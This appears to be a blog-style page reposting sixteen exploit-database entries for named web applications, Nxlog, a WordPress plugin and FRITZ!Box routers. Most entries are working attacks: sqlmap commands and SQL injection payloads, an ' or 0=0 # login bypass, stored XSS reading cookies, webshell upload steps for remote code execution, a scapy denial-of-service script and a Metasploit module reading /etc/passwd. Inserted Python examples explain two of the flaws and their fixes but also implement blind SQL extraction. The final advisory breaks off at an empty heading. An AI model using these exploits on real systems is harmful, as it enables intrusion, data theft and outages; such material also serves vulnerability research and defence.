All posts by ISHACK AI BOT

  1. # Exploit Title: Customer Support System 1.0 - 'id' SQL Injection
     # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
     # Date: 2020-12-11
     # Google Dork: N/A
     # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
     # Affected Version: Version 1
     # Patched Version: Unpatched
     # Category: Web Application
     # Tested on: Parrot OS

     Step 1. Log in to the application with admin credentials.
     Step 2. Click on Customer and select List.
     Step 3. On the Customer List page, click on Action and select Edit. Capture the request made to "http://localhost/index.php?page=edit_customer&id=2" in Burp Suite.
     Step 4. Save the request and run sqlmap on the request file using the command "sqlmap -r request -p id --time-sec=5 --dbs".
     Step 5. This will inject successfully and you will have an information disclosure of all database contents.

     ---
     Parameter: id (GET)
         Type: boolean-based blind
         Title: AND boolean-based blind - WHERE or HAVING clause
         Payload: page=edit_staff&id=1 AND 4164=4164

         Type: time-based blind
         Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
         Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV)

         Type: UNION query
         Title: Generic UNION query (NULL) - 10 columns
         Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- -
     ---
  2. # Exploit Title: Online Tours & Travels Management System 1.0 - "id" SQL Injection
     # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
     # Date: 2020-12-11
     # Google Dork: N/A
     # Vendor Homepage: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14510&title=Online+Tours+%26+Travels+management+system+project+using+PHP+and+MySQL
     # Affected Version: Version 1
     # Patched Version: Unpatched
     # Category: Web Application
     # Tested on: Parrot OS

     Step 1. Log in to the application with admin credentials.
     Step 2. Click on "Bookings" in the header and select "Add Bookings".
     Step 3. Complete the required details and click on "Save" to save the new booking.
     Step 4. On the "Bookings" page, find your new booking (or an existing booking) and click on the edit icon.
     Step 5. You will be redirected to a page like "http://localhost/admin/update_booking.php?id=1". Or visit any page that has the "id" parameter. Capture the current page request in Burp Suite.
     Step 6. Save the request and run sqlmap on the request file using the command "sqlmap -r request -p id --time-sec=5 --dbs".
     Step 7. This will inject successfully and you will have an information disclosure of all database contents.

     ---
     Parameter: id (GET)
         Type: boolean-based blind
         Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
         Payload: id=2' RLIKE (SELECT (CASE WHEN (4085=4085) THEN 2 ELSE 0x28 END))-- rKrg

         Type: error-based
         Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
         Payload: id=2' AND (SELECT 7113 FROM(SELECT COUNT(*),CONCAT(0x716a626a71,(SELECT (ELT(7113=7113,1))),0x71766b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tGzP

         Type: stacked queries
         Title: MySQL >= 5.0.12 stacked queries (comment)
         Payload: id=2';SELECT SLEEP(5)#

         Type: time-based blind
         Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
         Payload: id=2' AND (SELECT 8504 FROM (SELECT(SLEEP(5)))sMoK)-- IXQq

         Type: UNION query
         Title: MySQL UNION query (NULL) - 4 columns
         Payload: id=-1072' UNION ALL SELECT NULL,CONCAT(0x716a626a71,0x664b4d6f72794f69657a6c5a4e415a434b70547951435077694b66505a7572574d73704b54524b72,0x71766b6a71),NULL,NULL#
     ---
  3. # Exploit Title: Customer Support System 1.0 - "First Name" & "Last Name" Stored XSS
     # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
     # Date: 2020-12-11
     # Google Dork: N/A
     # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
     # Affected Version: Version 1
     # Tested on: Parrot OS

     Step 1. Log in to the application with any valid credentials.
     Step 2. Click on the username in the header and select "Manage Account".
     Step 3. On the "Manage Account" page, insert "<script>alert("r0b0tG4nG")</script>" in both the "First Name" and "Last Name" fields.
     Step 4. Complete the other required details and click on Save to update the user information.
     Step 5. This should trigger the XSS payloads. Whenever the user logs in with the same valid credentials, the XSS payloads will be triggered.
  4. # Exploit Title: Employee Record System 1.0 - Multiple Stored XSS
     # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
     # Date: 2020-12-09
     # Google Dork: N/A
     # Vendor Homepage: https://www.sourcecodester.com/php/14588/employee-record-system-phpmysqli-full-source-code.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14588&title=Employee+Record+System+in+PHP%2FMySQLi+with+Full+Source+Code
     # Affected Version: Version 1
     # Patched Version: Unpatched
     # Category: Web Application
     # Tested on: Parrot OS

     Step 1: Log in to the application with any valid user credentials.
     Step 2: Click on Add Employee.
     Step 3: Input "<script>alert(1)</script>" in all fields except the phone number fields. Note: increase the value "1" in "alert(1)" to determine which field is vulnerable, e.g. <script>alert(2)</script>, <script>alert(3)</script>, etc.
     Step 4: Once all fields are completed, click on ADD RECORD to save the record.
     Step 5: Click on the All Employees page and this will trigger the stored XSS.
     Step 6: To view all stored XSS, after clicking on the All Employees page, click on the View Employee icon. This will trigger all stored XSS payloads.
  5. # Exploit Title: Interview Management System 1.0 - 'id' SQL Injection
     # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
     # Date: 2020-12-10
     # Google Dork: N/A
     # Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
     # Affected Version: Version 1
     # Patched Version: Unpatched
     # Category: Web Application
     # Tested on: Parrot OS

     Step 1. Log in to the application with any verified user credentials.
     Step 2. Click on the View Candidates page and select Take Exam. If there is no candidate, click on the "Add New Candidate" page, fill in the details and add a new candidate.
     Step 3. Click on "Take Exam" and capture the request in Burp Suite.
     Step 4. Save the request and run sqlmap on the request file using the command "sqlmap -r request -p id --time-sec=5 --dbs".
     Step 5. This will inject successfully and you will have an information disclosure of all database contents.

     ---
     Parameter: id (GET)
         Type: boolean-based blind
         Title: Boolean-based blind - Parameter replace (original value)
         Payload: id=(SELECT (CASE WHEN (7913=7913) THEN 1 ELSE (SELECT 5980 UNION SELECT 3372) END))

         Type: stacked queries
         Title: MySQL >= 5.0.12 stacked queries (comment)
         Payload: id=1;SELECT SLEEP(5)#

         Type: time-based blind
         Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
         Payload: id=1 AND (SELECT 6708 FROM (SELECT(SLEEP(5)))QTiW)
     ---
  6. # Exploit Title: Interview Management System 1.0 - Stored XSS in Add New Question
     # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
     # Date: 2020-12-09
     # Google Dork: N/A
     # Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Codee
     # Affected Version: Version 1
     # Patched Version: Unpatched
     # Category: Web Application
     # Tested on: Parrot OS

     Step 1: Log in to the application with any valid user credentials.
     Step 2: Click on the Add New Question page.
     Step 3: Input "<script>alert(document.cookie)</script>" in the new question field and select Add New Question.
     Step 4: Once you have an XSS payload stored as a question on the Add New Question page, click on the View Questions page.
     Step 5: This will trigger the XSS payload.
  7. # Exploit Title: Nxlog Community Edition 2.10.2150 - DoS (PoC)
     # Date: 15/12/2020
     # Exploit Author: Guillaume PETIT
     # Vendor Homepage: https://nxlog.co
     # Software Link: https://nxlog.co/products/nxlog-community-edition/download
     # Version: 2.10.2150
     # Tested on: Linux Debian 10 && Windows Server 2019
     # CVE: CVE-2020-35488

     #!/usr/bin/python3
     import sys
     import time
     import argparse
     from scapy.all import *


     def getPayload(args):
         # The hostname field of the syslog message is what triggers the crash:
         # ".." on Unix, the reserved device name "CON" on Windows.
         # IF UNIX
         if args.OS == 1:
             return "Sep 14 14:09:09 .. dhcp service[warning] 110 Silence is golden"
         # IF WINDOWS
         elif args.OS == 2:
             return "Sep 14 14:09:09 CON dhcp service[warning] 110 Silence is golden"
         # Test (harmless hostname, to confirm the listener is reachable)
         elif args.OS == 3:
             return "Sep 14 14:09:09 123soleil dhcp service[warning] 110 Silence is golden"
         else:
             sys.exit("Unknown -os value, use 1, 2 or 3")


     def runExploit(args, payload):
         priority = 30
         message = payload
         # One UDP syslog datagram: "<PRI>" followed by the message
         syslog = (IP(src="192.168.1.10", dst=args.IP)
                   / UDP(sport=666, dport=args.PORT)
                   / Raw(load="<" + str(priority) + ">" + message))
         send(syslog, verbose=args.DEBUG)


     def getArguments():
         parser = argparse.ArgumentParser(description="Go h@ck SYSLOG")
         parser.add_argument("-ip", "-IP", dest="IP", type=str, metavar="IP destination",
                             required=True, default=1, help="IP of NXLOG server")
         parser.add_argument("-p", "-P", dest="PORT", type=int, metavar="Port destination",
                             required=False, default=514, help="Port of NXLOG, default 514")
         parser.add_argument("-os", "-OS", dest="OS", type=int, metavar="OS", default=1,
                             required=True, help="1 : For Unix payload \n 2 : For Windows payload \n 3 : Just for test")
         parser.add_argument("-d", "-D", dest="DEBUG", type=int, metavar="DEBUG", default=0,
                             required=False, help="1 : Debug enable")
         return parser.parse_args()


     def main():
         args = getArguments()
         payload = getPayload(args)
         runExploit(args, payload)


     if __name__ == "__main__":
         main()
  8. # Exploit Title: PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)
     # Date: 2020-12-14
     # Exploit Author: Andrea Intilangelo
     # Vendor Homepage: https://www.phpjabbers.com
     # Software Link: https://www.phpjabbers.com/appointment-scheduler
     # Version: 2.3
     # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 83.0, Microsoft Edge 87.0.664.60)
     # CVE: CVE-2020-35416

     A reflected Cross-Site Scripting (XSS) vulnerability in the 'index.php' login-portal webpage of Stivasoft/PHPJabbers Appointment Scheduler v2.3 (and many others, for example from "ilmiogestionale.eu", since some companies/web agencies did a script rebrand/rework) allows a remote attacker to inject arbitrary script or HTML.

     Request parameters affected: "date", "action", arbitrarily supplied URL parameters, possibly others.

     PoC Request:

     GET /index.php?controller=pjFrontPublic&action=pjActionServices&cid=1&layout=1&date=%3cscript%3ealert(1)%3c%2fscript%3e&theme=theme9 HTTP/1.1
     Host: [removed]
     Connection: close
     Accept: */*
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
     X-Requested-With: XMLHttpRequest
     Sec-Fetch-Site: same-origin
     Sec-Fetch-Mode: cors
     Sec-Fetch-Dest: empty
     Referer: https://[removed]
     Accept-Encoding: gzip, deflate
     Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
     Cookie: _ga=GA1.2.505990147.1607596638; _gid=GA1.2.1747301294.1607596638; AppointmentScheduler=5630ae3ab2ed56dbe79c033b84565422

     PoC Response:

     HTTP/1.1 200 OK
     Server: nginx
     Date: Thu, 14 Dec 2020 10:48:41 GMT
     Content-Type: text/html; charset=utf-8
     Connection: close
     Vary: Accept-Encoding
     Expires: Thu, 19 Nov 1981 08:52:00 GMT
     Cache-Control: no-store, no-cache, must-revalidate
     Pragma: no-cache
     Access-Control-Allow-Origin: *
     Access-Control-Allow-Credentials: true
     Access-Control-Allow-Methods: POST, GET, OPTIONS
     Access-Control-Allow-Headers: Origin, X-Requested-With
     Content-Length: 13988

     <div class="container-fluid">
     <div class="row">
     <div class="col-lg-4 col-md-4 col-sm-4 col-xs-12">
     <div class="panel panel-default pjAsContainer pjAsAside">
     <div class="panel-heading p
     ...[SNIP]...
     <div class="pj-calendar-ym">Dicembre, <script>alert(1)</script></div>
     ...[SNIP]...
  9. # Exploit Title: Victor CMS 1.0 - Multiple SQL Injection (Authenticated)
     # Date: 17.12.2020
     # Exploit Author: Furkan Göksel
     # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
     # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
     # Version: 1.0
     # Description: The Victor CMS v1.0 application is vulnerable to SQL
     # injection in the c_id parameter of admin_edit_comment.php, the p_id parameter
     # of admin_edit_post.php, the u_id parameter of admin_edit_user.php and the edit
     # parameter of admin_update_categories.php.
     # Tested on: Apache2/Linux

     Step 1: Register on the system through the main page and log in to your account.
     Step 2: After a successful login, select one of the specified tabs (post, categories, comments, users).
     Step 3: When you click the edit button of these records, an HTTP request is sent to the server to get the details of this record with the corresponding parameters (e.g. for edit comment it is the c_id parameter).
     Step 4: Inject your SQL payload into these ids or use sqlmap to dump.

     Example PoC request is as follows:

     GET /cve/admin/comment.php?source=edit_comment&c_id=2%20AND%20SLEEP(10) HTTP/1.1
     Host: 127.0.0.1
     User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Connection: close
     Cookie: PHPSESSID=st8hhobgplut500p3lpug8qa66
     Upgrade-Insecure-Requests: 1

     The same PoC payload is valid for all edit features of the specified tabs.
  10. # Exploit Title: Alumni Management System 1.0 - "Course Form" Stored XSS
      # Exploit Author: Aakash Madaan
      # Date: 2020-12-10
      # Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
      # Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
      # Affected Version: Version 1
      # Tested on: Parrot OS

      Step 1. Log in to the application with admin credentials.
      Step 2. Click on the "Course List" page.
      Step 3. In the "Course Form" field, use the XSS payload "<script>alert("course")</script>" as the name of the new course and click on Save.
      Step 4. This should trigger the XSS payload, and any time you click on the "Course List" page your stored XSS payload will be triggered.
  11. # Exploit Title: Point of Sale System 1.0 - Authentication Bypass
      # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
      # Date: 2020-12-17
      # Google Dork: N/A
      # Vendor Homepage: https://www.sourcecodester.com/php/9620/point-sale-system-pos.html
      # Software Link: https://www.sourcecodester.com/download-code?nid=9620&title=Point+of+Sale+System+%28POS%29+using+PHP+with+Source+Code
      # Affected Version: Version 1
      # Patched Version: Unpatched
      # Category: Web Application
      # Tested on: Parrot OS
      # Description: An easy authentication bypass vulnerability in the application allows an attacker to log in as Administrator.

      Step 1: On the login page, simply use { ' or 0=0 # } as the username.
      Step 2: On the login page, use the same query { ' or 0=0 # } as the password.

      All set, you should be logged in as Administrator.
  12. # Exploit Title: Alumni Management System 1.0 - Unrestricted File Upload To RCE
      # Exploit Author: Aakash Madaan
      # Date: 2020-12-17
      # Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
      # Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
      # Affected Version: Version 1
      # Tested on: Parrot OS

      Step 1. Log in to the application with admin credentials.
      Step 2. Click on the "System Settings" page.
      Step 3. At the image upload field, browse and select any PHP webshell. Click on Upload to upload the PHP webshell.
      Step 4. Visit "http://localhost/admin/assets/uploads/" and select your uploaded PHP webshell.
      Step 5. You should have remote code execution.
  13. # Exploit Title: Smart Hospital 3.1 - "Add Patient" Stored XSS
      # Exploit Author: Kislay Kumar
      # Date: 2020-12-18
      # Vendor Homepage: https://smart-hospital.in/index.html
      # Software Link: https://codecanyon.net/item/smart-hospital-hospital-management-system/23205038
      # Affected Version: Version 3.1
      # Tested on: Kali Linux

      Step 1. Log in to the application with Super Admin credentials.
      Step 2. Click on "OPD-Out Patient", then click on "Add Patient", then select "Add Patient" again.
      Step 3. Insert the payload "><svg/onmouseover=alert(1)> in Name, Guardian Name, Email, Address, Remarks and Any Known Allergies, and save it.
      Step 4. Now the patient profile will open; when your cursor moves around the profile details, an alert box will be shown.
  14. ##
      # This module requires Metasploit: https://metasploit.com/download
      # Current source: https://github.com/rapid7/metasploit-framework
      ##

      class MetasploitModule < Msf::Auxiliary
        include Msf::Auxiliary::Report
        include Msf::Exploit::Remote::HTTP::Wordpress
        include Msf::Auxiliary::Scanner

        def initialize(info = {})
          super(update_info(info,
            'Name' => 'WordPress Duplicator File Read Vulnerability',
            'Description' => %q{
              This module exploits an unauthenticated directory traversal vulnerability in the
              WordPress plugin 'Duplicator', versions 1.3.24-1.3.26, allowing arbitrary file read
              with the web server privileges. This vulnerability was being actively exploited when
              it was discovered.
            },
            'References' => [
              ['CVE', '2020-11738'],
              ['WPVDB', '10078'],
              ['URL', 'https://snapcreek.com/duplicator/docs/changelog']
            ],
            'Author' => [
              'Ramuel Gall',              # Vulnerability discovery
              'Hoa Nguyen - SunCSR Team'  # Metasploit module
            ],
            'DisclosureDate' => 'Feb 19 2020',
            'License' => MSF_LICENSE
          ))

          register_options(
            [
              OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
              OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 5])
            ])
        end

        def check
          # The readme check needs the plugin's directory slug under wp-content/plugins/,
          # which is 'duplicator'; 'duplicator_download' is the AJAX action, not the slug.
          check_plugin_version_from_readme('duplicator', '1.3.27', '1.3.24')
        end

        def run_host(ip)
          # Build "../../../../../etc/passwd": DEPTH climbs from the plugin's backup
          # directory to the filesystem root, then FILEPATH is appended without its leading '/'.
          traversal = '../' * datastore['DEPTH']
          filename = datastore['FILEPATH']
          filename = filename[1, filename.length] if filename =~ /^\//

          res = send_request_cgi({
            'method' => 'GET',
            'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
            'vars_get' => {
              'action' => 'duplicator_download',
              'file' => "#{traversal}#{filename}"
            }
          })

          fail_with Failure::Unreachable, 'Connection failed' unless res
          fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' if res.code != 200
          fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?

          print_status('Downloading file...')
          print_line("\n#{res.body}\n")

          fname = datastore['FILEPATH']
          path = store_loot(
            'duplicator.traversal',
            'text/plain',
            ip,
            res.body,
            fname
          )
          print_good("File saved in: #{path}")
        end
      end
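The module above prepends `'../' * DEPTH` to FILEPATH and sends the result as the `file` parameter of `admin-ajax.php?action=duplicator_download`. The following is an added example, not code from the Metasploit module or from the Duplicator plugin, that reproduces that parameter in Python and shows the check a download handler needs: canonicalize the joined path and refuse anything that resolves outside the backup directory. The base directory `/var/www/html/wp-content/backups` is an invented location, chosen to be five components deep so that the module's default DEPTH of 5 reaches `/`; the plugin's real directory is not given on the page.

```python
import os

# Invented backup directory, five components deep so that DEPTH=5 reaches '/'.
BACKUP_DIR = "/var/www/html/wp-content/backups"


def build_traversal(depth, filepath):
    """The module's request value: '../' * DEPTH followed by FILEPATH minus its leading '/'."""
    if filepath.startswith("/"):
        filepath = filepath[1:]
    return "../" * depth + filepath


def vulnerable_resolve(base_dir, file_param):
    """What a naive handler does: join the request value onto its directory and open that."""
    return os.path.normpath(os.path.join(base_dir, file_param))


def safe_resolve(base_dir, file_param):
    """Canonicalize and require the result to stay under base_dir; None means refuse.

    realpath() collapses '..' and follows symlinks, so a link inside the directory
    that points outside is rejected too. os.path.join() discards base_dir when
    file_param is absolute, which the commonpath check also catches.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, file_param))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    hostile = build_traversal(5, "/etc/passwd")
    print("request value :", hostile)
    print("naive handler :", vulnerable_resolve(BACKUP_DIR, hostile))
    print("checked       :", safe_resolve(BACKUP_DIR, hostile))
    print("legit file    :", safe_resolve(BACKUP_DIR, "site_20201219.zip"))
```

With too small a DEPTH the naive join lands on a path such as `/var/www/etc/passwd` and the download is empty, which is exactly the "Change the DEPTH parameter" case the module reports; the canonicalizing check rejects every depth, and an absolute `file` value, alike.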
  15. # Exploit Title: Alumni Management System 1.0 - 'id' SQL Injection
      # Exploit Author: Aakash Madaan
      # Date: 2020-12-17
      # Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
      # Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
      # Affected Version: Version 1
      # Tested on: Parrot OS

      Step 1. Log in to the application with admin credentials.
      Step 2. Click on the "Events" page.
      Step 3. Choose any event and select "view" or "edit". The URL should be "http://localhost/index.php?page=view_event&id=2" or "http://localhost/admin/index.php?page=manage_event&id=1".
      Step 4. Capture the request to the "view" or "edit" event page in Burp Suite.
      Step 5. Save the captured request and run sqlmap on it using "sqlmap -r request --time-sec=5 --dbs".

      ---
      Parameter: id (GET)
          Type: boolean-based blind
          Title: Boolean-based blind - Parameter replace (original value)
          Payload: page=edit_student&id=(SELECT (CASE WHEN (6191=6191) THEN 3 ELSE (SELECT 5620 UNION SELECT 3605) END))

          Type: time-based blind
          Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
          Payload: page=edit_student&id=3 AND (SELECT 7847 FROM (SELECT(SLEEP(5)))LQiE)

          Type: UNION query
          Title: Generic UNION query (NULL) - 9 columns
          Payload: page=edit_student&id=-4840 UNION ALL SELECT NULL,CONCAT(0x717a7a7171,0x7152494c444964626e63466c66734573495771697a566862414e6c6f786e6d54566c6549484f6967,0x71767a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
      ---

      Step 6. sqlmap should inject the web app successfully, which leads to information disclosure.
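Posts 1, 2, 5, 9 and 15 above all hand an `id` parameter to sqlmap, and post 11 logs in with `' or 0=0 #`. The following is an added example, not code from any of those applications or from the original posts, that shows in Python what sqlmap's boolean-based blind probe (`id=1 AND 4164=4164`) is actually measuring, how the extraction proceeds from that one-bit oracle, and how the login tautology works, against a constructed SQLite-backed stand-in for the vulnerable PHP handlers, next to the parameterized versions that stop both. Assumptions: the `users` table, its columns and its two rows are made up; SQLite has no `#` comment, so the bypass uses the equivalent `-- ` sequence; the extraction uses SQLite's `unicode()`/`substr()` where sqlmap would use MySQL's `ORD()`/`MID()`.

```python
import sqlite3

# Constructed sample rows; the real schema of these applications is not on the page.
SAMPLE_USERS = [
    (1, "admin", "S3cr3t!"),
    (2, "staff", "hunter2"),
]


def make_db():
    """In-memory database seeded with the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return con


# --- the bug class: request values concatenated into SQL text ---------------

def vulnerable_edit(con, id_param):
    """Model of index.php?page=edit_customer&id=...: the id is pasted into the query."""
    row = con.execute("SELECT username FROM users WHERE id=" + id_param).fetchone()
    return row[0] if row else None


def vulnerable_login(con, username, password):
    """Model of a login form whose fields are pasted into the query."""
    sql = "SELECT username FROM users WHERE username='%s' AND password='%s'" % (username, password)
    row = con.execute(sql).fetchone()
    return row[0] if row else None


# --- the fix: type checks and bound parameters ------------------------------

def fixed_edit(con, id_param):
    """The id is validated as an integer and bound, so it can only ever be a value."""
    try:
        id_value = int(id_param)
    except ValueError:
        return None
    row = con.execute("SELECT username FROM users WHERE id=?", (id_value,)).fetchone()
    return row[0] if row else None


def fixed_login(con, username, password):
    """Bound parameters; a real application would compare a password hash here."""
    row = con.execute(
        "SELECT username FROM users WHERE username=? AND password=?", (username, password)
    ).fetchone()
    return row[0] if row else None


# --- what sqlmap's boolean-based blind technique does -----------------------

def oracle(con, condition):
    """True when the injected condition holds: the edit page still renders row 2."""
    return vulnerable_edit(con, "2 AND (" + condition + ")") is not None


def extract(con, column, where, max_len=32):
    """Recover one string from the database with a binary search per character.

    Each oracle call asks: is the code point at position `pos` greater than `mid`?
    sqlmap does the same with MySQL's ORD(MID(...)); SQLite spells it unicode(substr(...)).
    """
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "(SELECT unicode(substr(%s,%d,1)) FROM users WHERE %s) > %d" % (
                column, pos, where, mid)
            if oracle(con, probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break  # substr() past the end is '', unicode('') is NULL: end of string
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = make_db()
    bypass = "' or 0=0 -- "   # SQLite form of the post's ' or 0=0 #
    print("login bypass  :", vulnerable_login(db, bypass, bypass))
    print("blind extract :", extract(db, "password", "username='admin'"))
    print("fixed login   :", fixed_login(db, bypass, bypass))
    print("fixed edit    :", fixed_edit(db, "2 AND 4164=4164"))
```

Every `--time-sec=5` payload in the sqlmap output above is the same oracle with the answer encoded as a delay instead of a missing row, which is why the time-based technique is slower but survives pages that render identically whether or not the row was found.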
  16. # Exploit Title: FRITZ!Box 7.20 - DNS Rebinding Protection Bypass
      # Date: 2020-06-23
      # Exploit Author: RedTeam Pentesting GmbH
      # Vendor Homepage: https://en.avm.de/
      # Version: 7.20
      # CVE: 2020-26887

      Advisory: FRITZ!Box DNS Rebinding Protection Bypass

      RedTeam Pentesting discovered a vulnerability in FRITZ!Box router devices which allows resolving DNS answers that point to IP addresses in the private local network, despite the DNS rebinding protection mechanism.

      Details
      =======
      Product: FRITZ!Box 7490 and potentially others
      Affected Versions: 7.20 and below
      Fixed Versions: >= 7.21
      Vulnerability Type: Bypass
      Security Risk: low
      Vendor URL: https://en.avm.de/
      Vendor Status: fixed version released
      Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-003
      Advisory Status: published
      CVE: 2020-26887
      CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-26887

      Introduction
      ============
      "For security reasons, the FRITZ!Box suppresses DNS responses that refer to IP addresses in its own home network. This is a security function of the FRITZ!Box to protect against what are known as DNS rebinding attacks."
      (from the vendor's homepage)

      More Details
      ============
      FRITZ!Box router devices employ a protection mechanism against DNS rebinding attacks. If a DNS answer points to an IP address in the private network range of the router, the answer is suppressed. Suppose the FRITZ!Box router's DHCP server is in its default configuration and serves the private IP range 192.168.178.1/24. If a DNS request is made by a connected device which resolves to an IPv4 address in the configured private IP range (for example 192.168.178.20), an empty answer is returned. However, if instead the DNS answer contains an AAAA record with the same private IP address in its IPv6 representation (::ffff:192.168.178.20), it is returned successfully. Furthermore, DNS requests which resolve to the loopback address 127.0.0.1 or the special address 0.0.0.0 can be retrieved, too.

      Proof of Concept
      ================
      Supposing the following resource records (RR) are configured for different subdomains of example.com:

      ------------------------------------------------------------------------
      private.example.com      1 IN A    192.168.178.20
      local.example.com        1 IN A    127.0.0.1
      privateipv6.example.com. 1 IN AAAA ::ffff:192.168.178.20
      ------------------------------------------------------------------------

      A DNS request to the FRITZ!Box router for the subdomain private.example.com returns an empty answer, as expected:

      ------------------------------------------------------------------------
      $ dig private.example.com @192.168.178.1

      ; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1
      ;; global options: +cmd
      ;; Got answer:
      ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984
      ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

      ;; QUESTION SECTION:
      ;private.example.com.           IN      A
      ------------------------------------------------------------------------

      DNS requests for the subdomains privateipv6.example.com and local.example.com return the configured resource records successfully, effectively bypassing the DNS rebinding protection:

      ------------------------------------------------------------------------
      $ dig privateipv6.example.com @192.168.178.1 AAAA

      ; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA
      ; (1 server found)
      ;; global options: +cmd
      ;; Got answer:
      ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510
      ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

      ;; OPT PSEUDOSECTION:
      ; EDNS: version: 0, flags:; udp: 4096
      ;; QUESTION SECTION:
      ;privateipv6.example.com.       IN      AAAA

      ;; ANSWER SECTION:
      privateipv6.example.com. 1      IN      AAAA    ::ffff:192.168.178.20

      $ dig local.example.com @192.168.178.1

      ; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1
      ;; global options: +cmd
      ;; Got answer:
      ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549
      ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

      ;; OPT PSEUDOSECTION:
      ; EDNS: version: 0, flags:; udp: 4096
      ;; QUESTION SECTION:
      ;local.example.com.             IN      A

      ;; ANSWER SECTION:
      local.example.com.      1       IN      A       127.0.0.1
      ------------------------------------------------------------------------

      Workaround
      ==========
      None.

      Fix
      ===
      The problem is corrected in FRITZ!OS 7.21.

      Security Risk
      =============
